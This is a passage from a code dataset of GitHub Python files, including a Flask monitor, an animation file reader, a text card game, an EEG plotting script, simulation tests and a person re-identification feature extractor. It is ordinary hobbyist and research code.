fallosEnRango + 1\n if(fallosEnRango == 3):\n logger.debug('Microservicio #' + str(microservicio) + ' en estado de fallo. Rango errores entre ' + str(limiteInferior) + ' y ' + str(limiteSuperior))\n fallo1 = None\n fallo2 = None\n fallo3 = None\n fallosEnRango = 0\n time.sleep(1)\n logger.removeHandler(ch)\n\nclass VistaMonitorRegistroPaciente(Resource):\n\n def get(self):\n\n call = Llamadas()\n\n threads = []\n # create the threads\n t1 = Thread(target=call.llamarMicroservicio1, args=(1,))\n t2 = Thread(target=call.llamarMicroservicio1, args=(2,))\n t3 = Thread(target=call.llamarMicroservicio1, args=(3,))\n threads.append(t1)\n threads.append(t2)\n threads.append(t3)\n t1.start()\n t2.start()\n t3.start()\n\n # wait for the threads to finish\n [ t.join() for t in threads ]\n\n return 'OK', 200","repo_name":"jmorenotuniandes/miso-arquitectura-agil-grupo-05","sub_path":"monitor/flaskr/vistas/vistas.py","file_name":"vistas.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24256992891","text":"from .data import *\nimport ctypes\nimport numpy as np\n\n\nclass PsaReader(object):\n \"\"\"\n This class will read the sequences and bone information immediately upon instantiation and hold onto a file handle.\n The key data is not read into memory upon instantiation due to it's potentially very large size.\n To read the key data for a particular sequence, call `read_sequence_keys`.\n \"\"\"\n def __init__(self, path):\n self.keys_data_offset: int = 0\n self.fp = open(path, 'rb')\n self.psa: Psa = self._read(self.fp)\n\n @property\n def bones(self):\n return self.psa.bones\n\n @property\n def sequences(self):\n return self.psa.sequences\n\n @staticmethod\n def _read_types(fp, data_class: ctypes.Structure, section: Section, data):\n buffer_length = section.data_size * section.data_count\n buffer = fp.read(buffer_length)\n offset = 0\n for _ in range(section.data_count):\n data.append(data_class.from_buffer_copy(buffer, offset))\n offset += section.data_size\n\n def read_sequence_data_matrix(self, sequence_name: str):\n sequence = self.psa.sequences[sequence_name]\n keys = self.read_sequence_keys(sequence_name)\n bone_count = len(self.bones)\n matrix_size = sequence.frame_count, bone_count, 7\n matrix = np.zeros(matrix_size)\n keys_iter = iter(keys)\n for frame_index in range(sequence.frame_count):\n for bone_index in range(bone_count):\n matrix[frame_index, bone_index, :] = list(next(keys_iter).data)\n return matrix\n\n def read_sequence_keys(self, sequence_name: str) -> List[Psa.Key]:\n \"\"\" Reads and returns the key data for a sequence.\n\n :param sequence_name: The name of the sequence.\n :return: A list of Psa.Keys.\n \"\"\"\n # Set the file reader to the beginning of the keys data\n sequence = self.psa.sequences[sequence_name]\n data_size = sizeof(Psa.Key)\n bone_count = len(self.psa.bones)\n buffer_length = data_size * bone_count * sequence.frame_count\n sequence_keys_offset = self.keys_data_offset + (sequence.frame_start_index * bone_count * data_size)\n self.fp.seek(sequence_keys_offset, 0)\n buffer = self.fp.read(buffer_length)\n offset = 0\n keys = []\n for _ in range(sequence.frame_count * bone_count):\n key = Psa.Key.from_buffer_copy(buffer, offset)\n keys.append(key)\n offset += data_size\n return keys\n\n def _read(self, fp) -> Psa:\n psa = Psa()\n while fp.read(1):\n fp.seek(-1, 1)\n section = Section.from_buffer_copy(fp.read(ctypes.sizeof(Section)))\n if section.name == b'ANIMHEAD':\n pass\n elif section.name == b'BONENAMES':\n PsaReader._read_types(fp, Psa.Bone, section, psa.bones)\n elif section.name == b'ANIMINFO':\n sequences = []\n PsaReader._read_types(fp, Psa.Sequence, section, sequences)\n for sequence in sequences:\n psa.sequences[sequence.name.decode()] = sequence\n elif section.name == b'ANIMKEYS':\n # Skip keys on this pass. We will keep this file open and read from it as needed.\n self.keys_data_offset = fp.tell()\n fp.seek(section.data_size * section.data_count, 1)\n elif section.name in [b'SCALEKEYS']:\n fp.seek(section.data_size * section.data_count, 1)\n else:\n raise RuntimeError(f'Unrecognized section \"{section.name}\"')\n return psa\n1","repo_name":"SilverDash/io_scene_psk_psa","sub_path":"io_scene_psk_psa/psa/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"6082118289","text":"#-------------------------------------------------------------------------------\r\n# Name: Hero Realms\r\n# Purpose: An attempt on creating a python code for a computer version of/\r\n# a board game \"Hero Realms\".\r\n#\r\n# Author: Julia Szuminska\r\n#\r\n# Created: 02/06/2020\r\n# Copyright: (c) Julia 2020\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n# Import section\r\nimport random\r\n\r\n\r\n\r\n# Format of the deck and cards:\r\n# Deck is a dictionary containing cards. Cards are individual dictionaries containing all properties of a card.\r\n# Example:\r\n# deck = {'dragon': {'type':'imperial', 'cost': 5, 'damage': 8, 'gold':0, 'healing': 0}, ...}\r\n\r\nstarterDeck = {'dagger': {'type': 'default', 'damage': 1, 'gold':0, 'healing': 0}, \\\r\n 'shortsword': {'type': 'default', 'damage': 2, 'gold':0, 'healing': 0}, \\\r\n 'coin1': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n 'coin2': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n 'coin3': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n 'coin4': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n 'coin5': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n 'coin6': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n 'coin7': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n 'ruby': {'type': 'default', 'damage': 0, 'gold':2, 'healing': 0}}\r\n\r\n\r\n# A function to create a deck based on file\r\n\r\ndef createDeckDict(filename):\r\n #Getting card information from a file, storing it in a list of lists\r\n with open(filename, 'r') as f:\r\n lines=f.readlines()\r\n splitLines= []\r\n for line in lines:\r\n splitLine = line.strip('\\n').split(',')\r\n splitLines += [splitLine]\r\n\r\n #Putting card properties in a dictionary\r\n deckDict={}\r\n for line in splitLines:\r\n deckDict[line[0]] = {'type': line[5], 'cost': line[4], 'damage': line[1],\\\r\n 'gold': line[2], 'healing':line[3]}\r\n return deckDict\r\n\r\n# A function to create a list with keys from a dictionary - this can be shuffled\r\ndef cardDictToL(givenD):\r\n cardNames = list(givenD.keys())\r\n return cardNames\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# Settig up initial sets of cards\r\n\r\n# starterDeck - a dictionary with initial cards\r\n\r\n# starterDeckL - a list with names of inintial cards - can be shuffled\r\nstarterDeckL = cardDictToL(starterDeck)\r\nprint(starterDeckL)\r\n\r\n\r\n# deckD - a full deck dictionary\r\ndeckD = createDeckDict('cards.csv')\r\n\r\n# deckL - a full deck list- can be shuffled\r\ndeckL = cardDictToL(deckD)\r\n\r\n# EXTRA set - a dictionary with full deck, not to be touched!\r\n\r\nsaverDeck= createDeckDict('cards.csv')\r\n\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# FUNCTIONS\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# A function to shuffle cards, should take a set of cards- a list.\r\n\r\ndef shuffle(cardSet):\r\n random.shuffle()\r\n return cardSet\r\n\r\n\r\n# Function definition: changeTurn()\r\n# When called, the function moves on to the next player\r\n\r\ndef changeTurn(currentPlayer, turnEnded):\r\n if turnEnded == True:\r\n if currentPlayer == noOfPlayers:\r\n currentPlayer = 0\r\n return currentPlayer\r\n else:\r\n currentPlayer = currentPlayer + 1\r\n return currentPlayer\r\n else:\r\n print('Current turn is still active. Player ', currentPlayer, 'should play')\r\n print('If player ', currentPlayer, 'has finished, type: \"END\"')\r\n userInput = input('Type END to finish turn: ')\r\n if userInput == 'END':\r\n if currentPlayer == noOfPlayers:\r\n currentPlayer = 0\r\n return currentPlayer\r\n else:\r\n currentPlayer = currentPlayer + 1\r\n return currentPlayer\r\n else:\r\n print('Player ', currentPlayer, \"'s turn\")\r\n return currentPlayer\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Setting up player profiles: playerProfileSetUp\r\n\r\n\r\n# variable deck must be a list\r\ndef playerProfileSetUp(noOfPlayers, health, deck):\r\n i=0\r\n playersValues={}\r\n while i <= noOfPlayers:\r\n nickname= str(input('Choose your name, player... '))\r\n playersValues[i] = {}\r\n playersValues[i]['name'] = nickname\r\n playersValues[i]['health']= health\r\n playersValues[i]['active cards']= []\r\n random.shuffle(deck)\r\n for card in deck:\r\n playersValues[i]['active cards'] += [card]\r\n playersValues[i]['discarded cards']= []\r\n i +=1\r\n return playersValues\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Pick a random card from deck.\r\n\r\ndef pickRandom(deck):\r\n cardToPick = random.choice(list(deck))\r\n #deleted = 0\r\n #for card in deck:\r\n # if card == cardToPick:\r\n # del card\r\n deck.remove(cardToPick)\r\n return cardToPick\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Update market\r\n\r\nmarket=[]\r\ndef updateMarket(market,deck):\r\n while len(market)<5:\r\n newCard =pickRandom(deck)\r\n market = market + [newCard]\r\n return market\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Draw 5 cards from personal deck-active cards. Gives output: \\\r\n# [newdraw, newactive, newdiscarded]\r\n# After using, set new card sets and print out 5 drawn cards.\r\n\r\ndef drawFive(activeCards, discardedCards):\r\n if len(activeCards) >= 5:\r\n newDraw = [activeCards[0:5]]\r\n activeCards = activeCards[5:]\r\n return [newDraw, activeCards, discardedCards]\r\n else:\r\n shuffle(discardedCards)\r\n activeCards = activeCards + discardedCards\r\n newDraw = [activeCards[0:5]]\r\n activeCards = activeCards[5:]\r\n discardedCards = []\r\n return [newDraw,activeCards, discardedCards]\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Check if game finished, if any health <= 0\r\n\r\ndef checkIfEnd(playersProfiles):\r\n for player in playersProfiles:\r\n if playersProfiles[player]['health'] <= 0:\r\n loser = playersProfiles[player]['name']\r\n gameEnd(loser)\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# End of the game function, when called, the game stops.\r\n\r\ndef gameEnd(loser):\r\n print(playersProfiles)\r\n print(loser, ' lost the game.')\r\n print('GAME OVER')\r\n gameEnded= True\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# GAMEPLAY\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# 1. Initial steps\r\n\r\n# Asks for a number of players, subsracts 1 to count from 0.\r\n\r\n#noOfPlayers = int(input('How many players? ')) - 1\r\nnoOfPlayers=1\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Asks for a value of health at the begining. Available values 20-100.\r\n\r\n#startingHealth = int(input('What is the starting value of health? (20-100) '))\r\n#while startingHealth <20 or startingHealth > 100:\r\n# print('Incorrect value of starting health, try again.')\r\n# startingHealth = int(input('What is the starting value of health? (20-100) '))\r\nstartingHealth=30\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Setting up player profiles\r\n\r\nplayersProfiles = playerProfileSetUp(noOfPlayers, startingHealth , starterDeckL)\r\nprint(playersProfiles)\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Setting up market\r\nmarket = updateMarket(market,deckL)\r\nprint( 'Cards in the market: ', market)\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# 2. Gameplay loop\r\n\r\ngameEnded =False\r\ncurrentPlayer=0\r\nwhile gameEnded == False:\r\n print(playersProfiles[currentPlayer]['name'], \"'s turn\" )\r\n pickedCards = drawFive(playersProfiles[currentPlayer]['active cards'], playersProfiles[currentPlayer]['discarded cards'])[0]\r\n playersProfiles[currentPlayer]['active cards'] = drawFive(playersProfiles[currentPlayer]['active cards'],\\\r\n playersProfiles[currentPlayer]['discarded cards'])[1]\r\n playersProfiles[currentPlayer]['discarded cards'] = drawFive(playersProfiles[currentPlayer]['active cards'],\\\r\n playersProfiles[currentPlayer]['discarded cards'])[2]\r\n print(pickedCards)\r\n\r\n # Count gold\r\n goldCount=0\r\n for m in pickedCards:\r\n for card in m:\r\n if card in starterDeck:\r\n goldCount += starterDeck[card]['gold']\r\n else:\r\n goldCount += saverDeck[card]['gold']\r\n print('You have ', goldCount, ' gold to spend.')\r\n\r\n print('Market:')\r\n for card in market:\r\n print(card, saverDeck[card])\r\n\r\n print(market)\r\n # Buying\r\n\r\n cardToBuy = str(input('Which card do you want to buy? Type 0 if none. '))\r\n\r\n while cardToBuy != '0':\r\n\r\n if cardToBuy not in market:\r\n print('Wrong input, try again.')\r\n cardToBuy = str(input('Which card do you want to buy? Type 0 if none. '))\r\n else:\r\n price = saverDeck[cardToBuy]['cost']\r\n print (\"card's price is\", price)\r\n market.remove(cardToBuy)\r\n if int(price) <= goldCount:\r\n print ('Enough money!')\r\n playersProfiles[currentPlayer]['discarded cards'] += [cardToBuy]\r\n print(playersProfiles[currentPlayer]['discarded cards'])\r\n\r\n print (playersProfiles[currentPlayer]['name'], 'has bought', cardToBuy)\r\n goldCount = goldCount - int(price)\r\n print ('You now have ', goldCount, ' gold to spend.')\r\n cardToBuy = input('What card do you want to buy now? Type 0 if you have finished buying. ')\r\n else:\r\n print(\"You don't have enough gold to buy\", cardToBuy)\r\n cardToBuy = input('Chose a different card or type in 0 if finished. ')\r\n\r\n # Count damage\r\n damageCount=0\r\n for m in pickedCards:\r\n for card in m:\r\n if card in starterDeck:\r\n damageCount += starterDeck[card]['damage']\r\n else:\r\n damageCount += saverDeck[card]['damage']\r\n print('You have ', damageCount, ' damage to use.')\r\n\r\n # Print health of all players\r\n i=0\r\n while i <= noOfPlayers:\r\n print(playersProfiles[i]['name'], 'is at', playersProfiles[i]['health'], 'health')\r\n i +=1\r\n\r\n # Use damage\r\n\r\n i=0\r\n while i <= noOfPlayers:\r\n if i != currentPlayer:\r\n print('How much damage for', playersProfiles[i]['name'], '?')\r\n damageGiven = int(input('How much damage? '))\r\n\r\n playersProfiles[i]['health']= playersProfiles[i]['health'] - damageGiven\r\n i +=1\r\n\r\n\r\n # Print health of all players\r\n i=0\r\n while i <= noOfPlayers:\r\n print(playersProfiles[i]['name'], 'is at', playersProfiles[i]['health'], 'health')\r\n i +=1\r\n\r\n\r\n # Healing part\r\n # Counting healing\r\n\r\n healingCount=0\r\n for m in pickedCards:\r\n for card in m:\r\n if card in starterDeck:\r\n healingCount = 0\r\n else:\r\n healingCount += saverDeck[card]['healing']\r\n print('You have ', healingCount, ' healing to use.')\r\n # Use healing\r\n playersProfiles[currentPlayer]['health']= playersProfiles[currentPlayer]['health'] + healingCount\r\n\r\n\r\n # End of turn\r\n # print health\r\n i=0\r\n while i <= noOfPlayers:\r\n print(playersProfiles[i]['name'], 'is at', playersProfiles[i]['health'], 'health')\r\n i +=1\r\n\r\n # update market\r\n market = updateMarket(market,deckL)\r\n print( 'Cards in the market: ', market)\r\n\r\n # Check if anyone has lost\r\n i=0\r\n while i <= noOfPlayers:\r\n if playersProfiles[i]['health'] == 0:\r\n gameEnded=True\r\n print('Player', playersProfiles[i]['name'], 'has lost.')\r\n loserOfGame=str(playersProfiles[i]['name'])\r\n i +=1\r\n\r\n print('End of turn. ')\r\n quitGame = str(input('If you want to quit the game, type Q'))\r\n if quitGame == 'Q':\r\n gameEnded = True\r\n\r\n\r\ngameEnd(loserOfGame)\r\n\r\n\r\n\r\n","repo_name":"jules793/HeroRealms","sub_path":"herorealms5.py","file_name":"herorealms5.py","file_ext":"py","file_size_in_byte":12698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34844886692","text":"# -*- encoding: utf-8 -*-\n'''\n@File : task7.py\n@Time : 2020/03/15 12:12:11\n@Author : xdbcb8 \n@Version : 1.0\n@Contact : xdbcb8@qq.com\n@WebSite : www.xdbcb8.com\n'''\n\n# here put the import lib\n\n'''\n7 随机生成20个学生的成绩; 判断这20个学生成绩的等级; 用函数来实现; \n A---成绩>=90; \n B-->成绩在 [80,90)\n C-->成绩在 [70,80)\n D-->成绩<70\n\n'''\n\nimport random\ndef judge(list):\n list1 = []\n for i in list:\n if i >= 90:\n list1.append('A')\n if i >=80 and i < 90:\n list1.append('B')\n if i >=70 and i < 80:\n list1.append('C') \n if i <70:\n list1.append('D') \n return list1 \n \nlist = [random.randint(0,100) for _ in range(1,11)]\nlist1 = judge(list)\nprint(\"学生成绩及等级如下:\")\nfor i in range(0,len(list)):\n print(list[i],\" \",list1[i])","repo_name":"zhongshiwei456/learngit","sub_path":"homework2/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2957650946","text":"from flask import Flask\nimport requests\n\napp = Flask(__name__)\n\nurl = \"https://google.com1111\"\ntry:\n # Make a request\n response = requests.get(url)\n\n # Check the response status code\n if response.status_code == 200:\n # Request was successful\n print(\"Request succeeded\")\n else:\n # Request failed with an error status code\n print(f\"Request failed with status code: {response.status_code}\")\n\nexcept requests.exceptions.RequestException as e:\n # Request encountered an exception\n print(\"An error occurred during the request:\")\n #print(type(e)) # Print the type of the exception\n print(e)\nexcept requests.exceptions.ConnectionError as conne:\n print(\"connection error\")","repo_name":"deepak2090/InterviewKickStart","sub_path":"requests_advanced/requestsadv.py","file_name":"requestsadv.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35866562184","text":"from torch_geometric.datasets import TUDataset\nfrom torch_geometric.data import DataLoader\nimport pickle\nimport os\n\n\n\nclass GraphDataset(object):\n \"\"\"\n \"\"\"\n def __init__(self,av):\n self.av = av\n self.load_graph()\n self.create_data_splits()\n\n def load_graph(self): \n fname = \"Datasets/\" + self.av.DATASET_NAME + \"_689_data1.pkl\"\n print (fname)\n if os.path.isfile(fname):\n self.dataset = pickle.load(open(fname,\"rb\"))\n else: \n self.dataset = TUDataset(root=\".\", name=self.av.DATASET_NAME)\n\n with open(fname,\"wb\") as f:\n pickle.dump(self.dataset,f)\n\n def create_data_splits(self):\n self.num_total_data = len(self.dataset)\n tr_idx_end = int(self.num_total_data * 0.7)\n val_idx_end = int(self.num_total_data * 0.8)\n self.num_val_data = val_idx_end - tr_idx_end\n self.num_test_data = self.num_total_data - val_idx_end \n self.loader_train = DataLoader(self.dataset[:tr_idx_end], batch_size=self.av.BATCH_SIZE, shuffle=True)\n self.loader_valid = DataLoader(self.dataset[tr_idx_end:val_idx_end], batch_size=self.num_val_data, shuffle=True)\n self.loader_test = DataLoader(self.dataset[val_idx_end:], batch_size=self.num_test_data, shuffle=False)\n\n \n","repo_name":"Indradyumna/cs689Project","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70082111530","text":"import numpy as np \nfrom pylsl import StreamInlet, resolve_byprop\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport time\nimport utils\n\nclass Band:\n Delta = 0\n Theta = 1\n Alpha = 2\n Beta = 3\n\n\"\"\" EXPERIMENTAL PARAMETERS \"\"\"\n\nBUFFER_LENGTH = 5\nEPOCH_LENGTH = 1\nOVERLAP_LENGTH = 0.8\nSHIFT_LENGTH = EPOCH_LENGTH - OVERLAP_LENGTH\nINDEX_CHANNEL = [0]\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\nnScan=0\nt=[]\nsensor={}\nsensor['A']=[]\nsensor['B']=[]\nsensor['G']=[]\nsensor['T']=[]\nstart_time=time.time()\n\ndef animate(i, eeg_buffer, filter_state, n_win_test, band_buffer):\n\n global t, start_time\n\n \"\"\" 3.1 ACQUIRE DATA \"\"\"\n eeg_data, timestamp = inlet.pull_chunk(timeout=1, max_samples=int(SHIFT_LENGTH * fs))\n ch_data = np.array(eeg_data)[:, INDEX_CHANNEL]\n eeg_buffer, filter_state = utils.update_buffer(eeg_buffer, ch_data, notch=True, filter_state=filter_state)\n\n \"\"\" 3.2 COMPUTE BAND POWERS \"\"\"\n data_epoch = utils.get_last_data(eeg_buffer, EPOCH_LENGTH * fs)\n band_powers = utils.compute_band_powers(data_epoch, fs)\n\n # Add x and y to lists\n sensor['A'].append(band_powers[0])\n sensor['B'].append(band_powers[1])\n sensor['G'].append(band_powers[2])\n sensor['T'].append(band_powers[3])\n t.append(((time.time())-start_time))\n\n # Limit x and y lists to 20 items\n sensor['A']=sensor['A'][-40:]\n sensor['B']=sensor['B'][-40:]\n sensor['G']=sensor['G'][-40:]\n sensor['T']=sensor['T'][-40:]\n t=t[-40:]\n\n # Draw x and y lists\n ax.clear()\n ax.plot(t, sensor['A'], color=\"blue\")\n ax.plot(t, sensor['B'], color=\"red\")\n ax.plot(t, sensor['G'], color=\"green\")\n ax.plot(t, sensor['T'], color=\"black\")\n\n # Format plot\n plt.title('sensor')\n plt.ylabel('data')\n plt.xlabel('time')\n plt.ylim(-2,4)\n\n\nif __name__ == \"__main__\":\n\n \"\"\" 1. CONNECT TO EEG STREAM \"\"\"\n\n # Search and active LSL streams\n print('Looking for an EEG stream...')\n streams = resolve_byprop('type', 'EEG', timeout=2)\n if len(streams) == 0:\n raise RuntimeError('Can\\'t find EEG stream.')\n print(\"Start acquiring data\")\n inlet = StreamInlet(streams[0], max_chunklen=12)\n eeg_time_correction = inlet.time_correction()\n info = inlet.info()\n description = info.desc()\n fs = int(info.nominal_srate())\n\n \"\"\" 2. INITIALIZE BUFFERS \"\"\"\n eeg_buffer = np.zeros((int(fs * BUFFER_LENGTH), 1))\n filter_state = None # for use with the notch filter\n n_win_test = int(np.floor((BUFFER_LENGTH - EPOCH_LENGTH) / SHIFT_LENGTH + 1))\n band_buffer = np.zeros((n_win_test, 4))\n\n # Set up plot to call animate() function periodically\n ani = animation.FuncAnimation(fig, animate, fargs=(eeg_buffer, filter_state, n_win_test, band_buffer), interval=(1), save_count=50)\n plt.show()\n \n\n","repo_name":"Bagnis-Gabriele/Robotic-hand","sub_path":"test_code/muse_animate_graphic/animated graphic muse.py","file_name":"animated graphic muse.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"4618551050","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nsys.path.insert(0, os.pardir)\nsys.path.insert(0, os.path.join(os.pardir, 'openmoc'))\nfrom testing_harness import TestHarness\nfrom input_set import SimpleLatticeInput\nimport openmoc.process as process\n\n\nclass MeshReactionRateTallyTestHarness(TestHarness):\n \"\"\"An eigenvalue calculation with a mesh tally of the fission rates\n using the openmoc.process module.\"\"\"\n\n def __init__(self):\n super(MeshReactionRateTallyTestHarness, self).__init__()\n self.input_set = SimpleLatticeInput()\n\n # Change spacing to avoid having rays start on lattice planes\n # Those rays are problematic because they cross through fuel pins\n # parallelly to sector planes.\n self.spacing = 0.12\n\n def _run_openmoc(self):\n \"\"\"Run an OpenMOC eigenvalue calculation.\"\"\"\n super(MeshReactionRateTallyTestHarness, self)._run_openmoc()\n\n def _get_results(self, num_iters=True, keff=True, fluxes=True,\n num_fsrs=True, num_tracks=True, num_segments=True,\n hash_output=True):\n \"\"\"Digest info from the mesh tallies and return as a string.\"\"\"\n\n # Create OpenMOC Mesh on which to tally reaction rates\n mesh = process.Mesh()\n mesh.dimension = [4, 4]\n mesh.lower_left = [-2., -2.]\n mesh.upper_right = [2., 2.]\n mesh.width = [1., 1.]\n\n outstr = \"\"\n for rxn in ('fission', 'flux', 'total', 'nu-fission', 'scatter'):\n # Tally OpenMOC reaction rates on the Mesh\n rxn_rates = mesh.tally_reaction_rates_on_mesh(\n self.solver, rxn, volume='integrated')\n # Append reaction rates to the output string\n outstr += rxn.title() + ' Rate Mesh Tally\\n'\n rates = ['{0:12.6E}'.format(rate) for rate in rxn_rates.ravel()]\n outstr += '\\n'.join(rates) + '\\n'\n \n return outstr\n\n\nif __name__ == '__main__':\n harness = MeshReactionRateTallyTestHarness()\n harness.main()\n","repo_name":"mit-crpg/OpenMOC","sub_path":"tests/test_mesh_reaction_rate_tally/test_mesh_reaction_rate_tally.py","file_name":"test_mesh_reaction_rate_tally.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"53"} +{"seq_id":"73251035048","text":"from django.conf.urls import url\nfrom log_management import views\n\nurlpatterns = [\n url(r\"^$\", views.index, name=\"index\"),\n url(r\"^setlog/([a-zA-Z0-9._ -]+)/$\", views.set_log, name=\"set_log\"),\n url(r\"^ajax/loginfo/$\", views.get_log_info, name=\"get_log_info\"),\n url(r\"^ajax/checkFitness/$\", views.get_new_fitness, name=\"get_new_fitness\"),\n url(r\"^ajax/fit/$\", views.fit, name=\"fit\"),\n]\n","repo_name":"bitsch/Mid-granular-analysis-tool-MasterThesis","sub_path":"WebProject/log_management/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9832946579","text":"class HTTPRequest:\n def __init__(self, method=None, request_uri=None, query_string = None, http_version=None, headers=None, body=None):\n self.method = method\n self.request_uri = request_uri\n self.query_string = query_string\n self.http_version = http_version\n if not headers:\n headers = dict()\n self.headers = headers\n self.body = body\n\n @staticmethod\n def parse(client):\n request = HTTPRequest()\n request_file = client.makefile()\n line = request_file.readline()\n line_split = line.split(\" \")\n request.method = line_split[0]\n full_uri = line_split[1].split(\"?\")\n request.request_uri = full_uri[0]\n request.query_string = \"\" if len(full_uri) <= 1 else full_uri[1]\n request.http_version = line_split[2]\n line = request_file.readline()\n while line != \"\\r\\n\":\n line_split = line.split(\": \")\n request.headers[line_split[0]] = line_split[1].strip()\n line = request_file.readline()\n\n if \"Content-Length\" in request.headers:\n request.body = request_file.read(int(request.headers[\"Content-Length\"]))\n\n request_file.close()\n return request\n","repo_name":"oknalv/piollo","sub_path":"httprequest.py","file_name":"httprequest.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5497809876","text":"import os\nimport cv2\nimport yaml\nimport scipy.io\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n \nimport torch\nimport torch.nn as nn\nfrom torchvision import datasets\nfrom model import ft_net\n \ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\ndef preprocess(img):\n img = cv2.resize(img,(224,224))\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = np.float32(img)/255.0\n img[:,:,]-=[0.485, 0.456, 0.406]\n img[:,:,]/=[0.229, 0.224, 0.225]\n return img\n \ndef extract_feature(model, img):\n img = preprocess(img)\n img = torch.from_numpy(img.transpose(2,0,1))\n img = img.unsqueeze(0).to(device)\n with torch.no_grad():\n outputs = model(img)\n fnorm = torch.norm(outputs, p=2, dim=1, keepdim=True)\n features = outputs.div(fnorm.expand_as(outputs))\n return features\n \ndef load_model():\n config_path = os.path.join('./model/ft_ResNet50/opts.yaml')\n with open(config_path, 'r') as stream:\n config = yaml.load(stream, Loader=yaml.FullLoader) # for the new pyyaml via 'conda install pyyaml'\n save_path = os.path.join('./model/ft_ResNet50/net_59.pth')\n model = ft_net(751)\n model.load_state_dict(torch.load(save_path))\n model.classifier.classifier = nn.Sequential()\n model = model.eval()\n return model.to(device)\n \ndef sort_img(feature, gf, gl):\n query = feature.view(-1,1)\n # print(query.shape)\n score = torch.mm(gf,query)\n score = score.squeeze(1).cpu()\n score = score.numpy()\n # predict index\n index = np.argsort(score) #from small to large\n index = index[::-1]\n junk_index = np.argwhere(gl==-1)\n mask = np.in1d(index, junk_index, invert=True)\n index = index[mask]\n return index, score[index]\n \ndef sort_img_faiss(feature, gf, gl):\n import faiss\n # index = faiss.IndexFlatL2(512)\n index = 